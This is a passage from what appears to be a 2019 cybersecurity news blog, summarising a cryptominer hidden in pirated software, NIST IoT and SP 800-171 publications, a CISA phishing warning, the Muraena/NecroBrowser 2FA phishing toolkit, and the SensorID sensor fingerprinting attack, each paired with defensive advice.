    The cryptominer hides itself once installed by watching the usage of the Activity Monitor, pausing its functions when it might be watched and can consume of up to 90% of the CPU. While the user might notice difficulties, troubleshooting it will be more troublesome than just looking at what's running. It can even detect what kind of CPU is used and how many cores are available, running up to two VMs simultaneously to more efficiently siphon off processing power. The Mac version runs QEMU, and the Windows version runs VirtualBox, and while the installation of the emulators require a trust verification, they name themselves "Oracle Corporation Network Service" to disguise their clandestine nature while setting the folders to which they are installed to hidden. The VM runs a version of Linux called Tiny Core Linux 9.0 and is set to mine Monero using XMRig, mining to a Mining pool. Profits are shared with other Monero users in the mining pool, but they are also untraceable to the attacker.

    It is always inadvisable to use pirated software, but if one ends up using software from less than reputable sources, be wary of unexpected CPU consumption, trust requests, services, or launch Daemons. While it can be nice to provide some value to a service that is otherwise free, it's definitely better when you’re an aware and willing participant.


Tuesday, June 25, 2019

Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks:

NIST announces the publication of NISTIR 8228, Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks, which provides guidance for federal agencies and other organizations to better understand and manage the risks associated with individual IoT devices throughout the lifecycles of those devices. It also considers three high-level goals for risk mitigation: device security, data security, and individual privacy. This introductory report provides the foundation for a planned series of publications on more specific aspects of this topic.


Publication details:


CSRC Update

Wednesday, June 19, 2019

NIST Announces the Initial Public Drafts of SP 800-171 Rev. 2 and SP 800-171B


NIST is seeking comments on Draft NIST Special Publication (SP) 800-171 Revision 2, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations, and Draft NIST SP 800-171B, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets.

The public comment period for both publications ends on July 19, 2019. Comments can also be submitted on a Department of Defense (DoD) cost estimate for implementing the enhanced security requirements of SP 800-171B. See the publication details links below for document files and instructions on submitting comments.


Draft NIST SP 800-171 Rev. 2 provides minor editorial changes in Chapters One and Two, and in the Glossary, Acronyms, and References appendices. There are no changes to the basic and derived security requirements in Chapter Three. For ease of use, the Discussion sections, previously located in Appendix F (SP 800-171 Rev. 1), have been relocated to Chapter Three to coincide with the basic and derived security requirements.

Publication details for SP 800-171 Rev. 2:


Draft NIST SP 800-171B, Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations: Enhanced Security Requirements for Critical Programs and High Value Assets, was developed in the spring of 2019 as a supplement to NIST SP 800-171. This new document offers additional recommendations for protecting Controlled Unclassified Information (CUI) in nonfederal systems and organizations where that information runs a higher than usual risk of exposure. When CUI is part of a critical program or a high value asset (HVA), it can become a significant target for high-end, sophisticated adversaries (i.e., the advanced persistent threat (APT)). In recent years, these critical programs and HVAs have been subjected to an ongoing barrage of serious cyberattacks, prompting the Department of Defense to request additional guidance from NIST.

The enhanced security requirements are to be implemented in addition to the basic and derived requirements in NIST SP 800-171, since the basic and derived requirements are not designed to address the APT.  The enhanced security requirements apply only to components of nonfederal systems that process, store, or transmit CUI or that provide protection for such components when the designated CUI is contained in a critical program or HVA. The enhanced security requirements are only applicable for a nonfederal system or organization when mandated by a federal agency in a contract, grant, or other agreement.

All public comments received on Draft NIST SP 800-171B will be posted at both https://csrc.nist.gov/projects/protecting-cui/public-comments and https://www.regulations.gov/docket?D=NIST-2019-0002 (Regulations.gov docket no. NIST-2019-0002) without change or redaction, so commenters should not include information they do not wish to be posted (e.g., personal or business information). 

The DoD has completed a cost analysis to provide stakeholders insight into the estimated cost of implementing the enhanced security requirements in Draft NIST SP 800-171B. The cost analysis is available for review and comment at the publication details link below. Please submit any comments regarding the DoD cost analysis review by July 19, 2019 to www.regulations.gov/docket?D=DOD-2019-OS-0072 (Regulations.gov docket no. DOD-2019-OS-0072).

Publication details for Draft SP 800-171B (including the document, DoD Cost Estimate, and recommended comment template):


NOTE: A call for patent claims is included in both draft publications. For additional information, see the “Information Technology Laboratory (ITL) Patent Policy--Inclusion of Patents in ITL Publications”:

Please send any questions to sec-cert@nist.gov.


Tuesday, June 18, 2019

DHS Email Phishing Scam

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of an email phishing scam that tricks users into clicking on malicious attachments that look like legitimate Department of Homeland Security (DHS) notifications. The email campaign uses a spoofed email address to appear like a National Cyber Awareness System (NCAS) alert and lure targeted recipients into downloading malware through a malicious attachment.

CISA encourages users and administrators take the following actions to avoid becoming a victim of social engineering and phishing attacks:

  • Be wary of unsolicited emails, even if the sender appears to be known; attempt to verify web addresses independently (e.g., contact your organization's helpdesk or search the internet for the main website of the organization or topic mentioned in the email).
  • Use caution with email links and attachments without authenticating the sender. CISA will never send NCAS notifications that contain email attachments.
  • Immediately report any suspicious emails to your information technology helpdesk, security office, or email provider.

Wednesday, June 12, 2019

Researchers presented a toolkit that automates phishing when 2 factor authentication

    Phishing attacks are perhaps the most common method attackers use to gain access to a target network. It is so common that many companies employ outside companies to generate test phishing campaigns in order to train employees on what to look out for. Even with these types of trainings many employees continue to type their credentials into pages designed specifically to steal them.  Implementing 2 factor authentication mitigates a lot of risk because login credentials became useless to an attacker without the time based one time use code 2 factor authentication provides. 

    In order to defeat 2 factor authentication attackers shifted their methods from collecting credentials to collecting session tokens. This makes the attack more complicated because instead of just setting up a fake login page that saves credentials and forwards the user like nothing happened they have to proxy the traffic in real-time in order to make the user type in their one time code. One time codes aren’t able to be used again however, making storing the captured information for later useless. Instead the attacker must capture the session token given out by the server on a successful login and use it in their own browser to gain access to the target system. While this attack was always possible a recently released toolkit makes it much easier.
    Last month at the Hack in a Box conference in Amsterdam researchers presented a toolkit that automates phishing when 2 factor authentication is involved. The toolkit is comprised of 2 parts that work together to automate the attack. The first is Muraena, a minimal configuration proxy designed to middleman the user and the target login page. It supports automatic resource rewriting so that the attacker doesn’t need to spend much time customizing each specific phish page. More advanced configuration options are available too, for sites which employ advanced anti-phishing defenses. The second part of the toolkit is NecroBrowser, an API controlled headless Chrome browser instance that is designed to utilize the session token stolen by Muraena. It is designed to be setup in an automated fashion so that it can immediately perform tasks on behalf of the attacker during a successful attack.  
    Currently there are very few solutions to successfully mitigate a well run attack with this toolkit . Utilizing Universal 2nd Factor authentication instead of traditional 2 factor services is the most successful way to prevent this attack as it completely prevents it from working. It is also important to continue training employees about the ever evolving attack landscape so that they can successfully identify and avoid these attacks.




SensorID, the calibration fingerprinting attack

    Over the years, app security has improved enough that developers must request permissions to areas of your smartphone that their applications need to access. Now we have some control over which apps have access to things such as your camera or extended storage. But did you know that there are still parts of your phone that require no permissions whatsoever? The average smartphone can have over a dozen sensors in it from accelerometers and gyroscopes to proximity sensors and GPS. When these sensors are calibrated at the factory, each one comes off the line with tiny imperfections. This results in each phone having its own unique fingerprint baked right into the firmware and accessible from any application or website.

    SensorID, the calibration fingerprinting attack, uses the calibration data from iOS magnetometers and gyroscopes and Android accelerometers, magnetometers, and gyroscopes to create a unique profile of a phone. Because this type of a fingerprint doesn’t change, a user could potentially be tracked across any application and on any website without ever knowing about it. The calibration data can be pulled from a device nearly instantly and requires little more than an app download or some JavaScript. 

    Apple devices are disproportionately impacted by SensorID due to the more rigorous calibration processes they go through at the factory, but the good news is that Apple addressed the issue in their March release of iOS 12.2. Junk data is now added to the calibration data to eliminate the fingerprint.
On the other hand, Google has yet to address the vulnerability, leaving some Android devices still open to this attack. It's mainly the higher-end Androids that are vulnerable as the less expensive devices often skip the sensor calibration step to save on cost, thus there exists no calibration data on the device to exploit. Google researchers are supposedly looking into the issue. 

    Even if your device is open to a calibration fingerprinting attack, there are still plenty of simpler attacks that cyber criminals (or advertisers) are more likely to leverage before one like SensorID.

    While that's not exactly comforting, hopefully SensorID has been cut off at the pass before it could become a bigger problem.